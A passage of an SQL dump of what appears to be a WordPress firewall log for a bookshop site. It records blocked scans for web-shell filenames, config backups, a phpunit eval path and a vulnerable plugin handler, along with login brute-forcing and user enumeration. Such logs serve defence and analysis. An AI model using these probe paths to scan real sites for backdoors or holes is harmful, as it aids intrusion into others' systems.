fabyeViJQBFcS3M','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637226846.6460,55,'qFIBA32ZVEkMliSrwcU4TCaO','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637226848.9455,55,'Ib3oiXWtAPqEm4UMrfJy7OKN','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637226852.6284,55,'6KXZ2UD5HRluhJbLGBvW8oTy','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637226854.6529,55,'O9Psiqy4okSrlutHeVcjN50M','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637226857.1080,55,'N8z0Wts2H9x34KRpLfceFoUQ','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637226858.8815,55,'31h5oxapMFC7DcbwTdtO2A9r','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637226861.0314,55,'VRYLs4oeJ1KItiUcClDNFgjE','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637226863.7736,55,'AGutW0gvwZb8nKEQpz5dBVJx','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637226866.0907,55,'CNeX1PwFH9mguO4GtnZhqLd8','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637226868.5400,55,'qbQjWG025UeIrtFfxiBPwl3a','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637226870.7062,55,'S7wyt9age6VkrNQ5IB8HPnoU','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637226873.1129,55,'Y54Aa0kIwHzrq8LSmGEuysUJ','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637226875.4278,55,'M2yOILt7viB4qz0XbwkEmsn9','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637226877.5342,55,'sHEQrfCq7tBxh6yApZmWRe4w','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637226879.8071,55,'LNUwMivcXFa6GdOmhRbrxQVZ','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637226881.7245,18,'zYEn2VZHRtuBO76UvGSwikqb','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637226884.0400,55,'XISjeCBLryc9DkmuJtaRxbfg','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637226886.8445,100,'sulh19gxfQLn6Pq7TYFvHzM8','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637226889.0656,100,'vaM7j4KGVsA5fJdPe8cZrFQy','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637226891.4675,55,'QRipYtNg6X9rUy1qnKFedBDh','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637226893.6816,100,'xZCvo8Odyu9EVQLlXicfb4tD','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637226896.0748,55,'jQAhPLyadwixbuZ83YpJkenV','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637226898.8771,55,'PbNAm0MO3GeBHo1zr29RVJ8F','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637226902.1264,55,'ljKpUOd8eaCuBZ36wJqISN72','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637226904.4946,55,'0i96IaGLgmWorOwRuhzctDKA','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637226906.0144,55,'POxAEmyawt2qfNXjdFKV75ig','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637226908.6565,55,'3EGDiKhJpu0gQtClwNan8sVH','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637226910.3680,55,'dGfIJNDUb3ycnw1hXzQsg47v','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637226913.1350,100,'iaS941vCFRHxDjVrlbm0PzTn','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637226915.4313,55,'cS9rKl7ep3yoXkZT0ma6BhnU','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637226918.0787,55,'E4D5MfvudFoKr1wPgG7xlCHb','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637226920.6902,55,'HIL54geprs6NQbW31UJafG8P','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('18.119.134.156',309823132,'',0,1637226977.4957,70,'MY3aHBVqyk2lAORcpZSv7xs8','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users'),('208.109.54.127',3496818303,'admin',0,1637227557.6438,7,'gazONY8STMi1AXrQIo7ZsvpU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('202.172.26.53',3400276533,'admin',0,1637229216.9405,7,'ed97ZrLVKOU02sygG8px3lJk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('139.59.118.238',2335930094,'admin',0,1637230901.2755,7,'FDUOCAiZbPne0IqsMj68dYN2','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('204.12.198.244',3423389428,'admin',0,1637236844.1403,7,'D1oe0cYtjGqbNgs7QECSdhLw','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('162.214.190.209',2731982545,'admin',0,1637241993.3320,7,'IoarhUvb4Q8BkXjxZiMqn51w','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.162.89.20',3164756244,'ashbooks',0,1637242562.0994,51,'Xa7yhHJpP5Tli8SdVBx09mcb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('222.252.97.73',3741081929,'ashbooks',0,1637242566.0970,51,'BT0uaM6ybCp1J7XUevgS4R8Q','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('189.56.166.5',3174606341,'ashbooks',0,1637242647.6369,51,'1XrSChBRLQuPHiONdm4vAK3D','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('201.251.127.123',3388702587,'ashbooks',0,1637242683.2397,51,'QlRbOoL4YFu3hZzMIxk9aq1C','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('85.227.82.3',1440961027,'ashbooks',0,1637242696.7264,51,'KeiY3kvyS6OdUN75bJIXj0lB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('202.165.236.204',3399871692,'ashbooks',0,1637242769.8272,51,'d9akPZ2fg5A7TQmK0zuGyS6X','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('143.198.179.234',2412164074,'admin',0,1637243823.7670,7,'0qc83S5vsdA6lF1HipjVNUoD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.163.224.119',1168367735,'admin',0,1637245705.3888,7,'lfYJFZDH4N3ksRqz9SVTauKh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.144.253.38',1737555238,'admin',0,1637247747.7904,7,'PwtLxs0XmQBjWFqpoHridDEz','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.144.225.142',764469646,'',0,1637248431.3886,55,'8abH0w7jfsDdkAPmhTUoN6VX','','19|0|0|0|ashbooks.co.uk/style.php'),('45.144.225.142',764469646,'',0,1637248462.3169,55,'i4nKlIzw9HFkdAJQMm2tvu5L','','19|0|0|0|ashbooks.co.uk/moduless.php'),('45.144.225.142',764469646,'',0,1637248482.7501,55,'4aCLEzcNp0rsKDd9m7XAS1f6','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('45.144.225.142',764469646,'',0,1637248506.7658,55,'42Wk0qIrc1H8oxtMSEDV9vUP','','19|0|0|0|ashbooks.co.uk/admin.php'),('45.144.225.142',764469646,'',0,1637248555.7466,55,'F5ygkjoEvfYGe6HUVA7Q4XOl','','19|0|0|0|ashbooks.co.uk/boom.php'),('45.144.225.142',764469646,'',0,1637248555.7797,10,'F5ygkjoEvfYGe6HUVA7Q4XOl','','707|0|0|0|ashbooks.co.uk/boom.php'),('45.144.225.142',764469646,'',0,1637248556.5743,55,'fvgoQkzxdiFuZCLWJ418aAD6','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('45.144.225.142',764469646,'',0,1637248577.1141,55,'vTkPhjXAE5nsa6IpYc8QqNOM','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('45.144.225.142',764469646,'',0,1637248603.0877,100,'sdkOm4BpSTQEFKwlcqNaIAeu','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('45.144.225.142',764469646,'',0,1637248647.7282,100,'5jeazWSXut436oxbRBUfNYAH','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('45.144.225.142',764469646,'',0,1637248673.9489,100,'A5HUexw3Ng0Xj1Q9SlpcP2yu','','13|0|0|0|ashbooks.co.uk/larva.php'),('45.144.225.142',764469646,'',0,1637248685.9946,100,'9oY0NqjWHcztLDS5hyskmGJF','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('45.144.225.142',764469646,'',0,1637248707.6613,55,'MAGbu16plcKoPk5hxafJVrB2','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('45.144.225.142',764469646,'',0,1637248732.0124,55,'N2zXqZSoAJBaWh07ucyVIdGC','','19|0|0|0|ashbooks.co.uk/alfa.php'),('23.83.179.217',391361497,'admin',0,1637248748.2254,7,'o6X5HLryMgNv3BGiAPhzxpd1','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.144.225.142',764469646,'',0,1637248748.4119,55,'TBAQV0E5RjnDKFcafw4ObxlJ','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('45.144.225.142',764469646,'',0,1637248770.8253,55,'fWjXMu5hl0aFUoZQnrkw4RVm','','19|0|0|0|ashbooks.co.uk/cindex.php'),('45.144.225.142',764469646,'',0,1637248796.7745,55,'CSGvXAFH2YQt1VagyE59KLix','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('45.144.225.142',764469646,'',0,1637248833.9213,55,'qdgSmZUDkVcyrzJWwbMHGijB','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('45.144.225.142',764469646,'',0,1637248849.2412,55,'vwks0DjALGWg6hUEltZJxcaC','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('45.144.225.142',764469646,'',0,1637248871.8604,55,'fGPuE6rwyahFOj7q0oRvdbCl','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('45.144.225.142',764469646,'',0,1637248896.4108,55,'kO5l7TcCiZh4RHg6VjMb9Wns','','19|0|0|0|ashbooks.co.uk/old-index.php'),('45.144.225.142',764469646,'',0,1637248913.0648,55,'xLXpjRogeuDd12zv0Ifk7HZa','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('45.144.225.142',764469646,'',0,1637248936.5894,55,'MVfGhCWBiFjzYy8v7wDxtkHE','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('45.144.225.142',764469646,'',0,1637248961.7580,55,'sWE6ZNSGCnPFytz3YeDpAxfh','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('45.144.225.142',764469646,'',0,1637248983.5695,55,'0y5Jk1vjK7SRoxATQL8tDqH3','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('45.144.225.142',764469646,'',0,1637249006.4664,55,'RWufAIkxnKjMw90y3OGJCrad','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('45.144.225.142',764469646,'',0,1637249025.1312,55,'kDgmTi5cJtR4oFbfhzQX0OSH','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('45.144.225.142',764469646,'',0,1637249052.8268,18,'o0nRXuhL9aKqHpx6z7s2dQSV','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('45.144.225.142',764469646,'',0,1637249076.4835,55,'ILNbXZVOyQRftFGSaiJ7vdeT','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('45.144.225.142',764469646,'',0,1637249094.4490,100,'dTK1wANpklC3rjsyaSHOX82g','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('45.144.225.142',764469646,'',0,1637249115.6976,100,'YaydQFVAJCu4Kxbl26gWot0h','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('45.144.225.142',764469646,'',0,1637249136.3130,55,'bNiEq7djSgW5HAeIrYMxzsL9','','19|0|0|0|ashbooks.co.uk/haders.php'),('45.144.225.142',764469646,'',0,1637249159.0599,100,'pjrL6N0nyvY3i81PZHDtGuOo','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('45.144.225.142',764469646,'',0,1637249178.7677,55,'XtqTljrvEKxJan78hY9FbIfp','','19|0|0|0|ashbooks.co.uk/legion.php'),('45.144.225.142',764469646,'',0,1637249206.9982,55,'l4jJQvG3EYympu8TBIr2xhaP','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('45.144.225.142',764469646,'',0,1637249216.2600,55,'eHgbGwNklD5JhV2pCu7sLnjY','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('45.144.225.142',764469646,'',0,1637249227.8949,55,'r62s4TKHd5bWVpQBGRvLFSPA','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('45.144.225.142',764469646,'',0,1637249242.5376,55,'kcalsPXRGN8I75OeSZpjmQBA','','19|0|0|0|ashbooks.co.uk/up.php'),('45.144.225.142',764469646,'',0,1637249255.8585,55,'wJq8yVSTkRIGLnWiQjNl5Dub','','19|0|0|0|ashbooks.co.uk/upload.php'),('45.144.225.142',764469646,'',0,1637249271.5941,55,'eSTqWs7nErc3L8OxzP6NAgU2','','19|0|0|0|ashbooks.co.uk/config.php'),('45.144.225.142',764469646,'',0,1637249283.3811,100,'GxXM9KRWtgnks4o5fcB0lZpy','','13|0|0|0|ashbooks.co.uk/test.php'),('45.144.225.142',764469646,'',0,1637249293.9169,55,'Esyg4IfPq5l0TFt7SYBeziL6','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('45.144.225.142',764469646,'',0,1637249316.7953,55,'PoVQTzj4dhY9AMX87g1r2Nkq','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('45.144.225.142',764469646,'',0,1637249325.3637,55,'0xiUWfevAt6F74aYLGuIrqym','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('159.203.115.159',2680910751,'admin',0,1637249666.2266,7,'fVaH7YzFNOtDwx0npSGu5J64','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637250300.8215,55,'ntbCh6GyM8gIo53iFqZYTvmw','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637250302.9076,55,'v98S1cWpR2YwloUBqQIPbgns','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637250305.5704,55,'o1OKGrV7ilhLsuEbSgYQJ0FT','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637250307.9895,55,'2XFl65AWSHzcJTtyjZhBOMsm','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637250315.0723,55,'hyXCLM98tkIHjvN2AaSdp4sY','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637250315.1105,10,'hyXCLM98tkIHjvN2AaSdp4sY','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637250317.4582,55,'Je5H2Uw8jadoMlWEkATBnRxv','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637250319.9265,55,'cj0uR7OMhBCoJrFHdm1SexXl','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637250323.3081,100,'yItJCL9Qen58ZpDhYu2KN0z3','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637250329.2892,100,'F3Vv9axpehLRtBS6Iq5cDksM','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637250331.6281,100,'YhXHc0fKWizU43MeJPxASplT','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637250333.9820,100,'hTE6GonLm4O2csPq0H75Nje3','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637250335.9112,55,'hM7p0Z2ci4LUV5YTWufmkHKS','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637250337.7710,55,'pVthOMlS6Q1vLKFBfxscNWIE','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637250340.5840,55,'UAPRarD0ds8lp4goZfxq9hXk','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637250342.9646,55,'QexEJ5Fzsq1ybUTSPXa2H78Z','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637250344.9104,55,'pa4CGX7OEUYcJvblAPKedt59','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637250347.0818,55,'CMj3kObUaQmVx6lfnY08JSgB','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637250349.5047,55,'OZfPMq3pboemsCzdTiKj4EW9','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637250351.8900,55,'vEY8D7kAO52zmeKFfL6h1nXN','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637250354.8270,55,'snPtvFMUGAjL9kOaN10EX8p4','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637250357.2646,55,'hLoGmgsUSNFi1wCHvE4O5XDT','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637250359.9331,55,'NtZwV3BlijYev7156mfGbIJD','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637250362.2839,55,'VEzBLuQ7F5hylrIXmJOYNKDc','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637250369.1555,55,'HkpPuqlhcfKdWN95TzbtOV8F','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637250371.5874,55,'3Pf9IopNhylrbwjKTmBDOqU1','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637250373.4219,55,'EzCyFoa6h28NlLcQp50BTOmx','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637250375.0121,18,'jKQP4LDZOTFlna1sfghUmxJG','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637250376.9384,55,'ZOdtfsS8WQTJmvAEC92ioMlz','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637250379.3267,100,'dXmDVxauMwg3hsqncQSHryzo','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637250382.1386,100,'qnuMN9xtIYoHF1bkcGXgzpsE','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637250384.7127,55,'BkTaDYwe5Jydzm01VqtSK647','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637250387.0898,100,'yJvzp5IcAtXTOYZiqxrjfVKW','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637250388.6796,55,'EAeXbaU5oRcTZuOxg3MNsFrz','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637250390.9024,55,'AuDhQp43OI6f78ymzgv1Kjor','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637250393.2904,55,'uTaVzchLrwm6KAdZ3G5OEiXS','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637250395.6954,55,'i1uM0KxbDp7OAEvaYZfmPwBT','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637250398.0645,55,'Rt8CScO5YVlWk7Dwu6xZ3LGy','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637250400.8554,55,'p4KEF0h7ePVDWzCicJxoGTfr','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637250404.9366,55,'rR1wlpSbzjYDn64s7TvXaIQZ','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637250407.2864,100,'8lLz0nCbyXJgSfNM3Ztw4eq5','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637250409.9903,55,'0KwUJyiOdpBVlGrxAHFLMoTZ','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637250412.0810,55,'1fSY7Ru68GdKgPXbI2Q4aAM3','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637250414.5775,55,'nlOzPdJGw1xHibo0qSQgUCF5','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('139.59.75.162',2335919010,'admin',0,1637251564.1872,7,'pzvYh8fkwu0XTIbUeExDZAoL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('139.59.118.238',2335930094,'admin',0,1637253495.0591,7,'tTo8jdx1DIV2aArv6BOuyZRe','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('163.178.170.141',2746395277,'admin',0,1637257599.9590,7,'Ny6sZQSXdftVAivTCe3GrUlu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.25.127.54',1360625462,'',0,1637258589.9336,55,'zClYHwvjQ0EIGO9ZKXo1MDuh','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-db-ajax-made/wp-ajax.php'),('103.114.144.212',1735561428,'admin',0,1637259599.3542,7,'sqgoCTXw4UZvl2uphtW0z3PG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.105.209.130',577360258,'admin',0,1637261720.9150,7,'ola9gmOBVt0JSf1eC2NkZWuF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('131.72.221.190',2202590654,'',0,1637262189.1204,70,'I6GYKQsA2WxqvRumw8g1Crez','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('185.191.34.215',3116311255,'',0,1637263834.5801,55,'GfTkcMzSNb2lQ6IFK5hd0Avi','','19|0|0|0|ashbooks.co.uk/wp-includes/SimplePie/gzdecodes.php'),('208.113.186.18',3497114130,'admin',0,1637265104.7445,7,'MezKSLNrcbAlQH9W6G5y0hsT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.249.36.84',2918786132,'admin',0,1637266718.1647,7,'aoPjUETJgwIxAOSm9f1R7MWD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.114',1364735090,'admin',0,1637268454.6507,7,'63NalmEAn18WYw5IUoDBJVXb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.206.92.65',3117308993,'admin',0,1637270046.1154,7,'ANa7DqW0oKlj5chmR9dBMwz8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.2.4.71',3103917127,'admin',0,1637271670.6716,7,'l2PxtNAqdZLHoVQX58DjUWmM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.163.152.242',3265501426,'admin',0,1637273209.5783,7,'D6esolNkWarySC58u2RvUpjK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.212.174.78',2731847246,'admin',0,1637274152.4185,7,'YK20dmCylSJxhDZLBFvGiHIf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('182.176.122.104',3065018984,'admin',0,1637274836.5481,7,'0SlesJrWRUmFYh4Htqp5GBIw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.97.68.199',2707506375,'admin',0,1637276624.4597,7,'vXJxekCSrljFBN7nyoRWTLcd','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.132.101',1920435301,'',0,1637279771.8206,55,'dmkK0SM3E1pPWgY7FLQslnOD','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('208.113.160.8',3497107464,'admin',0,1637280459.9553,7,'LQgATil93NWHy0mRoUZYkajC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('208.113.160.8',3497107464,'admin',0,1637282290.6065,7,'PcmYeB53wDvqarbsKHugRZ4F','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('144.91.68.146',2421900434,'admin',0,1637283942.4433,7,'2S6xIitTVGMlLZ3wbucN1peX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'admin',0,1637284602.8565,7,'iWze6bXurRIPJjO0sGF2vDYo','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'admin',0,1637284612.2092,7,'RqhWU18T5noscf2jFCNrJw7H','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'admin',0,1637284620.9836,7,'bKJDmuA0ajMEzi1SNfO6HpVI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'admin',0,1637284629.8998,7,'185Tjlo7beFsIqcwR6aGYWAN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'admin',0,1637284638.3712,7,'E843KDQ6NxTubhdGjnLPXfv1','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'',0,1637284638.3863,10,'E843KDQ6NxTubhdGjnLPXfv1','','701|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'',0,1637284639.9752,50,'qtQdkJoDSAselN5i6UVBruEW','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('173.212.235.115',2916412275,'admin',0,1637285651.6129,7,'W5hdeXKp7j86YZqm2MzE4kVG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.114.144.212',1735561428,'admin',0,1637287464.1557,7,'gQhn4XjqUl8wyME1e3ivxJFT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.132.101',1920435301,'',0,1637289800.3355,55,'DcimKs2CgBv1WUyoed3azGt4','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('162.55.85.219',2721535451,'',0,1637290838.5836,55,'4Vw3f0uxO5XEc1zybAK9TUHF','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('104.37.84.5',1747276805,'admin',0,1637291108.6426,7,'4DvcsxA1UWzLjk0nES6ON8Ql','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.182.210.155',95867547,'admin',0,1637291926.5166,7,'0gPMNZAhmVi6wGYcavC5nkR8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.37.127.214',338001878,'admin',0,1637292547.6944,7,'VyPhE85nxZXdY0B3OQDScMaK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('52.44.101.206',875324878,'admin',0,1637294258.5724,7,'PmcDeSZpUC4XM9kQNEjowGsx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.217.144.72',1608093768,'admin',0,1637296024.5590,7,'mOCesaVExGoFr7iu1c4LZkf5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.175',1364735151,'admin',0,1637297672.0238,7,'TWYjcCwhiqr7AvoU2HtFy68M','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('198.23.238.74',3323457098,'admin',0,1637299172.4042,7,'RzkXIyDZAOCxwnhmKdip0Fj8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.89.201.91',2673461595,'admin',0,1637299340.6656,7,'4Dw9Go2ItPVcjpRdh8YBA5vO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('147.124.220.233',2474433769,'',0,